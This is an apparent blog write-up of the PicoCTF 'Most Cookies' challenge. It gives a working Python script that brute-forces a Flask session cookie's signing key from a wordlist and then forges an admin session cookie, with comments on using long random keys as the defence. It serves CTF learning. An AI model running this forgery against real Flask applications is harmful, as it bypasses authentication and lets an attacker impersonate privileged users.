Most Cookies - PicoCTF
March 15, 2022•222 words
Followed explanation at this link
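Just remember to put your own session cookie in the `cookie` variable and update `wordlist` with the candidate secrets the app may have used to sign it. The approach only works because the signing key comes from a short, guessable list; a long random secret key could not be recovered by trying candidates like this.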
import flask
import hashlib
from sys import argv
from flask.json.tag import TaggedJSONSerializer
from itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignature
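# Session cookie captured from the challenge site; replace it with your own.
# Its first segment is base64url JSON and decodes to {"very_auth":"blank"},
# which is where the session key name used further down comes from.
cookie = 'eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Yh4n3A.tAnfOTWKodF6TbdczS-Pt-JPzdM'

# Candidate secret keys. Signing is only as strong as the key: a key taken
# from a short list like this can be recovered offline from one cookie.
wordlist = [
    "snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap",
    "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses",
    "kiss", "biscotti", "butter", "spritz", "snowball", "drop",
    "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle",
    "icebox", "gingerbread", "tassie", "lebkuchen", "macaron",
    "black and white", "white chocolate macadamia",
]


def _session_serializer(secret):
    """Return a serializer set up like Flask's default cookie session.

    The keyword names carry underscores (``secret_key``, ``signer_kwargs``,
    ``key_derivation``, ``digest_method``); the published listing lost them,
    which makes itsdangerous reject the call with a TypeError.
    """
    return URLSafeTimedSerializer(
        secret_key=secret,
        salt='cookie-session',
        serializer=TaggedJSONSerializer(),
        signer=TimestampSigner,
        signer_kwargs={
            'key_derivation': 'hmac',
            'digest_method': hashlib.sha1,
        },
    )


for secret in wordlist:
    try:
        # loads() verifies the HMAC before returning the payload, so a wrong
        # candidate raises BadSignature instead of yielding data.
        _session_serializer(secret).loads(cookie)
    except BadSignature:
        continue

    print('Secret key: {}'.format(secret))
    # Same key name as in the decoded cookie, with the value changed.
    session = {'very_auth': 'admin'}
    print(_session_serializer(secret).dumps(session))
    # One key signed the cookie; nothing more to learn from the rest.
    break
else:
    print('No candidate in wordlist matches the cookie signature')

# Defensive takeaway: the server's secret key should be a long random value
# (for example from secrets.token_hex()) and never a dictionary word, because
# signed cookies protect integrity only while the key stays unguessable.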